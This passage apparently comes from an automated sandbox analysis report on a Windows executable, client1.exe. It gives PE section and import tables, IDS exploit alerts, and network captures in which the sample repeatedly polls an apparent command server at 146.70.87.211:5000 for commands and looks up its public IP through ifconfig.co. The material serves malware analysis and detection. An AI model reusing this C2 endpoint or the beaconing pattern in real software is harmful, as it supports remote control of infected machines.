| IMAGE_DIRECTORY_ENTRY_IAT | 0x2a000 | 0x418 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x28800 | 0x28800 | 443d51fb84559b563832949912f06b00 | False | 0.5583465952932098 | data | 6.488023200564254 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x2a000 | 0x12b16 | 0x12c00 | c6b0ffbdaacfaeb0aa8a402d7fb00a75 | False | 0.5154817708333334 | data | 5.824698040892216 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x3d000 | 0x103f8 | 0xe00 | afabb66fdcd2825de5909f10c900fca7 | False | 0.13309151785714285 | DOS executable (block device driver \377\3) | 1.8096886543499544 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .pdata | 0x4e000 | 0x20c4 | 0x2200 | 7b210ceebebc00c96d1c55c2b456bbb4 | False | 0.47794117647058826 | data | 5.274096406482418 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| _RDATA | 0x51000 | 0x15c | 0x200 | c059b775abce97446903f3597b027fae | False | 0.384765625 | data | 2.808567494642619 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0x52000 | 0xf49c | 0xf600 | 1273c8b32d60012638cc8eef409fdb8d | False | 0.803639481707317 | data | 7.555569735712573 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x62000 | 0x758 | 0x800 | 11aaafc72361ec8886a740c3e209ceb3 | False | 0.544921875 | data | 5.2576643703968475 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x52208 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.585820895522388 |
| RT_ICON | 0x530b0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.7360108303249098 |
| RT_ICON | 0x53958 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.755057803468208 |
| RT_ICON | 0x53ec0 | 0x952c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9975384937676757 |
| RT_ICON | 0x5d3ec | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.3887966804979253 |
| RT_ICON | 0x5f994 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.49530956848030017 |
| RT_ICON | 0x60a3c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.7207446808510638 |
| RT_GROUP_ICON | 0x60ea4 | 0x68 | data | | | 0.7019230769230769 |
| RT_MANIFEST | 0x60f0c | 0x58f | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.4462403373155306 |
| DLL | Import |
|---|---|
| USER32.dll | CreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW |
| COMCTL32.dll | |
| KERNEL32.dll | GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, IsValidCodePage, GetACP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetOEMCP, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetEndOfFile, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW |
| ADVAPI32.dll | OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW |
| GDI32.dll | SelectObject, DeleteObject, CreateFontIndirectW |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-04T09:49:36.882714+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.8 | 49712 | TCP |
| 2024-11-04T09:50:15.115068+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.8 | 49723 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Nov 4, 2024 09:49:43.026171923 CET497175000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:43.029470921 CET497175000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:43.034316063 CET500049717146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:43.536169052 CET500049717146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:43.536421061 CET497175000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:43.536545038 CET497175000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:43.541255951 CET500049717146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:48.538871050 CET497185000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:48.543811083 CET500049718146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:48.543936014 CET497185000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:48.544023991 CET497185000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:48.548830032 CET500049718146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:49.051907063 CET500049718146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:49.052043915 CET497185000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:49.070000887 CET497185000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:49.076317072 CET500049718146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:54.072217941 CET497195000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:54.077101946 CET500049719146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:54.077218056 CET497195000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:54.077294111 CET497195000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:54.082041979 CET500049719146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:54.583244085 CET500049719146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:54.583304882 CET497195000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:54.583425045 CET497195000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:54.588185072 CET500049719146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:59.586015940 CET497205000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:59.590831041 CET500049720146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:59.590965986 CET497205000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:59.591022968 CET497205000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:59.595783949 CET500049720146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:00.103120089 CET500049720146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:00.103204012 CET497205000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:00.103322983 CET497205000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:00.108088017 CET500049720146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:05.105369091 CET497215000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:05.110261917 CET500049721146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:05.110358000 CET497215000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:05.110410929 CET497215000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:05.115412951 CET500049721146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:05.615422010 CET500049721146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:05.615624905 CET497215000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:05.615804911 CET497215000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:05.620604038 CET500049721146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:10.618227005 CET497225000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:10.623073101 CET500049722146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:10.623153925 CET497225000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:10.623347998 CET497225000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:10.628106117 CET500049722146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:11.135529995 CET500049722146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:11.135600090 CET497225000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:11.135745049 CET497225000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:11.140582085 CET500049722146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:16.138068914 CET497245000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:16.253690004 CET500049724146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:16.253829956 CET497245000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:16.290586948 CET497245000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:16.296114922 CET500049724146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:16.775443077 CET500049724146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:16.775662899 CET497245000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:16.778744936 CET497245000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:16.783529043 CET500049724146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:21.790030956 CET497255000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:21.840755939 CET500049725146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:21.840837955 CET497255000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:21.840990067 CET497255000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:21.845796108 CET500049725146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:22.472575903 CET500049725146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:22.472702980 CET497255000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:22.478147030 CET497255000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:22.729926109 CET500049725146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:22.729981899 CET497255000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:22.730832100 CET500049725146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:27.480331898 CET497265000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:27.485203028 CET500049726146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:27.485301018 CET497265000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:27.485373974 CET497265000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:27.490178108 CET500049726146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:28.014653921 CET500049726146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:28.014795065 CET497265000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:28.014859915 CET497265000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:28.019706011 CET500049726146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:33.017357111 CET497275000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:33.022273064 CET500049727146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:33.022367001 CET497275000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:33.022425890 CET497275000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:33.027827978 CET500049727146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:33.528086901 CET500049727146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:33.528228998 CET497275000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:33.528377056 CET497275000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:33.533225060 CET500049727146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:38.530678988 CET497305000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:38.535542965 CET500049730146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:38.535619020 CET497305000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:38.535686016 CET497305000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:38.540471077 CET500049730146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:39.036963940 CET500049730146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:39.037094116 CET497305000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:39.037220955 CET497305000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:39.042013884 CET500049730146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:44.039870024 CET497315000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:44.045089960 CET500049731146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:44.045200109 CET497315000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:44.045330048 CET497315000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:44.050358057 CET500049731146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:44.553555965 CET500049731146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:44.553630114 CET497315000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:44.553755999 CET497315000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:44.558845997 CET500049731146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:49.556010962 CET497325000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:49.560995102 CET500049732146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:49.561132908 CET497325000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:49.561132908 CET497325000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:49.566071033 CET500049732146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:50.066209078 CET500049732146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:50.066440105 CET497325000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:50.066481113 CET497325000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:50.071280003 CET500049732146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:55.068658113 CET497335000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:55.073659897 CET500049733146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:55.073787928 CET497335000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:55.073851109 CET497335000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:55.078716040 CET500049733146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:55.706204891 CET500049733146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:55.706404924 CET497335000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:55.706625938 CET497335000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:55.711469889 CET500049733146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:00.725275040 CET497345000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:00.730321884 CET500049734146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:00.730420113 CET497345000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:00.730496883 CET497345000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:00.735308886 CET500049734146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:01.236129999 CET500049734146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:01.236182928 CET497345000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:01.236377001 CET497345000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:01.241218090 CET500049734146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:06.241374969 CET497355000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:06.246557951 CET500049735146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:06.246774912 CET497355000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:06.249640942 CET497355000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:06.254513979 CET500049735146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:06.756910086 CET500049735146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:06.756963968 CET497355000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:06.758027077 CET497355000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:06.762821913 CET500049735146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:11.760324955 CET497365000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:11.765466928 CET500049736146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:11.765616894 CET497365000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:11.765666008 CET497365000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:11.770507097 CET500049736146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:12.266064882 CET500049736146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:12.266146898 CET497365000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:12.266246080 CET497365000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:12.271037102 CET500049736146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:17.293462992 CET497375000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:17.298472881 CET500049737146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:17.298578978 CET497375000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:17.335611105 CET497375000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:17.340735912 CET500049737146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:17.804378986 CET500049737146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:17.804469109 CET497375000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:17.804599047 CET497375000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:17.809329987 CET500049737146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:22.960197926 CET497385000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:22.965121984 CET500049738146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:22.965213060 CET497385000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:22.965276957 CET497385000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:22.970398903 CET500049738146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:23.470443964 CET500049738146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:51:23.470560074 CET497385000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:23.470695972 CET497385000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:51:23.477209091 CET500049738146.70.87.211192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 4, 2024 09:49:21.044339895 CET | 61191 | 53 | 192.168.2.8 | 1.1.1.1
Nov 4, 2024 09:49:21.051662922 CET | 53 | 61191 | 1.1.1.1 | 192.168.2.8

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 4, 2024 09:49:21.044339895 CET | 192.168.2.8 | 1.1.1.1 | 0x616f | Standard query (0) | ifconfig.co | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 4, 2024 09:49:21.051662922 CET | 1.1.1.1 | 192.168.2.8 | 0x616f | No error (0) | ifconfig.co | | 172.67.168.106 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 09:49:21.051662922 CET | 1.1.1.1 | 192.168.2.8 | 0x616f | No error (0) | ifconfig.co | | 104.21.54.91 | A (IP address) | IN (0x0001) | false
                                                  • 146.70.87.211:5000
                                                  • ifconfig.co
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe

Timestamp | Bytes transferred | Direction | Data
Nov 4, 2024 09:49:20.929239035 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49709 | 172.67.168.106 | 80 | 4032 | C:\Windows\System32\curl.exe

Timestamp | Bytes transferred | Direction | Data
Nov 4, 2024 09:49:21.062191010 CET | 75 | OUT | GET / HTTP/1.1
                                                  Host: ifconfig.co
                                                  User-Agent: curl/7.83.1
                                                  Accept: */*
Nov 4, 2024 09:49:21.781905890 CET | 757 | IN | HTTP/1.1 200 OK
                                                  Date: Mon, 04 Nov 2024 08:49:21 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 15
                                                  Connection: keep-alive
                                                  cf-cache-status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FI7ZML8J7ZFwHSUnqUrZ2axJojgjp9EnmM8IfEuZMtxjbHyuffPEsiwOAUpKcBJcjwCJSnVDTJDGWlCfdQ906VbxaQLd8FG79oPs6udgtsWYvz3hSIeGZckMtxBOzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8dd359adf88f6b65-DFW
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1240&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=75&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 0a
                                                  Data Ascii: 173.254.250.69


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49710 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe

Timestamp | Bytes transferred | Direction | Data
Nov 4, 2024 09:49:26.449234009 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49711 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe

Timestamp | Bytes transferred | Direction | Data
Nov 4, 2024 09:49:31.968652010 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49716 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe

Timestamp | Bytes transferred | Direction | Data
Nov 4, 2024 09:49:37.516756058 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49717 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe

Timestamp | Bytes transferred | Direction | Data
Nov 4, 2024 09:49:43.029470921 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49718 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe

Timestamp | Bytes transferred | Direction | Data
Nov 4, 2024 09:49:48.544023991 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49719 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe

Timestamp | Bytes transferred | Direction | Data
Nov 4, 2024 09:49:54.077294111 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49720 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe

Timestamp | Bytes transferred | Direction | Data
Nov 4, 2024 09:49:59.591022968 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  9 | 192.168.2.8 | 49721 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 4, 2024 09:50:05.110410929 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  10 | 192.168.2.8 | 49722 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 4, 2024 09:50:10.623347998 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept: */*
                                                  Connection: keep-alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  11 | 192.168.2.8 | 49724 | 146.70.87.211 | 5000 | 6776 | C:\Users\user\Desktop\client1.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 4, 2024 09:50:16.290586948 CET | 173 | OUT | GET /clients/996/commands HTTP/1.1
                                                  Host: 146.70.87.211:5000
                                                  User-Agent: python-requests/2.31.0
